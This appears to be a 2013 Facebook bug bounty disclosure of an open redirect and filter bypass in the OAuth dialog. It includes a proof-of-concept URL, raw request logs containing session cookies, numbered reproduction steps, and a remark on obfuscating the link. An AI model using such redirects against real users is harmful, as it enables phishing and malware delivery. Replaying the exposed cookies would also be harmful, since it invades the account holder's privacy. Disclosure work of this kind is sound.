Facebook Bug Bounty 2013 – Open Redirect Vulnerability



An open redirect and filter bypass vulnerability was detected in the official Facebook website and the Facebook core application. The vulnerability allows an attacker to bypass the basic validation of the application module and redirect users, without authorization, to an external source.

Normally the redirect exception only allows a redirect to allowed or internal applications. The attacker exchanges the application URL id with a valid request and can inject a URL pointing to an external target, but the attacker needs to append `bind.php#_=_` to the end of the domain for the redirect to the external source to succeed. After the URL is requested (it does not expire, because the client id can be exchanged at random with others), the request redirects the victim to another web page.

The vulnerability does not only bypass the validation of the redirect URI; it also bypasses the basic Website URL validation and, finally, the Canvas URL module. By including `true` after the permission in the request, the Canvas URL and basic Website URL validation message pops up; in the second step the attacker can bypass the restriction and filter to request the external source context with the bound `bind.php` file at the end.

The payload with the URL can also be HTML-encoded and obfuscated, so the malicious link is no longer obviously visible to the Facebook customer.

The vulnerability was detected in the original Facebook web page when processing a request to a normal (2013) Facebook profile. The vulnerability can be exploited by remote attackers without a privileged application user account and with low required user interaction. Successful exploitation results in a filter validation bypass and external open redirects to malware, to active exploit code, or to open redirect websites with evil context.

The vulnerability can be exploited by remote attackers without a privileged application user account but with low required user interaction. For demonstration or to reproduce …

— 1. Application Request Log (Standard) — The original F.B. would like to access your public profile, friend list, email address and birthday.

URL: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... %26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

— 2. Application Request Log (Manipulated) — Given URL is not allowed by the Application configuration.: One or more of the given URLs is not allowed by the App’s settings. It must match the Website URL or Canvas URL, or the domain must be a subdomain of one of the App’s domains.

URL: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... %26error_code%3D200%26error_description%3DPermissions%2Btrue%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

— 3. Session Request Log — 12:32:38.390[0ms][total 0ms] Status: pending[] GET https://www.facebook.com/ajax/typeahead/search/bootstrap.php?filter[0]=a... friendlist&viewer=100001940496405& token=v7&lazy=1&__user=100001940496405&__a=1&__dyn=7AgliRz41eFqw&__req=1 Load Flags[LOAD_BACKGROUND ] Content Size[unknown] Mime Type[unknown]

Request Headers: Host[www.facebook.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-SVN-Rev[849772] Referer[https://www.facebook.com/dialog/oauth?client_id=197213247091377 &redirect_uri=http%3A%2F%2Fwww.vulnerability-lab.com%2Fbind.php%3Ferror%3Daccess_denied%26error_cod... %3DPermissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday] Cookie[datr=7SPAUV-Qdp3p5toUeuJmVKKh; xs=61%3AAW4yu2J9DGjrdg%3A2%3A1371546617; s=Aa67iFZyBa4AeBX5.BRwCP5; lu=RgkYWDlJbKsH78Zpl3lJq1NQ; fr=0SkSCcUdfk9Q4Ib5h.AWU23DrSih0nmu_WSCdundo3WiY.BRwCP5.oA.AWXSujgm; csm=2; c_user=100001940496405; sub=-1744793600; act=1371551493977%2F6; p=106; presence=EM371551558EuserFA21B01940496405A2EstateFDsb2F0Et2F_5b_5dElm2Fnull Euct2F1371546017BEtrFnullEtwF3378383057EatF1371551496190G371 551558336CEchFDp_5f1B01940496405F70CC] –> Status: pending[] GET https://www.facebook.com/ajax/typeahead/search/bootstrap.php?filter[0]=u... Load Flags[LOAD_BACKGROUND ] Content Size[unknown] Mime Type[unknown]

Request Headers: Host[www.facebook.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-SVN-Rev[849772] Referer[https://www.facebook.com/dialog/oauth?client_id=197213247091377 &redirect_uri=http%3A%2F%2Fwww.vulnerability-lab.com%2Fbind.php%3Ferror%3Daccess_denied%26error_cod... %3DPermissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday] Cookie[datr=7SPAUV-Qdp3p5toUeuJmVKKh; xs=61%3AAW4yu2J9DGjrdg%3A2%3A1371546617; s=Aa67iFZyBa4AeBX5.BRwCP5; lu=RgkYWDlJbKsH78Zpl3lJq1NQ; fr=0SkSCcUdfk9Q4Ib5h.AWU23DrSih0nmu_WSCdundo3WiY.BRwCP5.oA.AWXSujgm; csm=2; c_user=100001940496405; sub=-1744793600; act=1371551493977%2F6; p=106; presence=EM371551558EuserFA21B01940496405A2EstateFDsb2F0Et2F_5b_ 5dElm2FnullEuct2F1371546017BEtrFnullEtwF337 8383057EatF1371551496190G371551558336CEchFDp_5f1B01940496405F70CC] –> GET http://www.vulnerability-lab.com/bind.php#_=_ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[802] Mime Type[text/html]

Request Headers: Host[www.vulnerability-lab.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Cookie[PHPSESSID=e85e337428d7bab99e6b1c3524ce4106] Connection[keep-alive]

Response Headers: Content-Type[text/html] Server[Microsoft-IIS/7.x] X-Powered-By[ASP.NET] X-Powered-By-XXX Date[Tue, 18 Jun 2013 10:32:44 GMT] Content-Length[802]

PoC: https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... TO EXTERNAL URL]%2Fbind.php%3Ferror%3D access_denied%26error_code%3D200%26error_description%3DPermissions%2Btrue%26error_reason%3D user_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

Unauthorized open redirect to external URL: https://www.vulnerability-lab.com/bind.php#_=_[Facebook Bug Bounty Program!]

Steps to reproduce …
1. Open the Facebook URL page and make sure you are logged in to standard Facebook with any test account.
2. Now open the original Facebook page and try to use the OAuth login.
3. The website will redirect you (1.).
4. Go to the URL bar of the browser, change the permission error to permission true and include your own external test URL.
5. Reload the request; now the web message of the basic Website URL validation and Canvas pops up with a message (2.).
6. Now cancel the request in the mask, which should normally prevent any kind of wrong execution to unauthorized or external sources.
7. The website redirects the user to the injected website and includes, from the vulnerable Facebook script, the `bind.php#_=_` at the end.
8. Successful reproduction of the vulnerability and bypass of the basic `website url` and `canvas` filters.

Reference(s): https://www.facebook.com/dialog/oauth?client_id=197213247091377&redirect... Permissions%2Btrue%26error_reason%3Duser_denied&state=25e324c39c44f6eb728419c5246ef4cf&scope=email%2Cuser_birthday

Facebook WhiteHat Bug Bounty Program 2013 - $1500 - Ismail Kaleem (MV)
